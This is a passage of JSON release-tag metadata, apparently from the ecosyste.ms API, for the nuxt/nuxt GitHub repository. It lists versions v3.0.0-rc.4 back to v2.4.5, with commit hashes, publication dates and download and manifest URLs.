a":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","k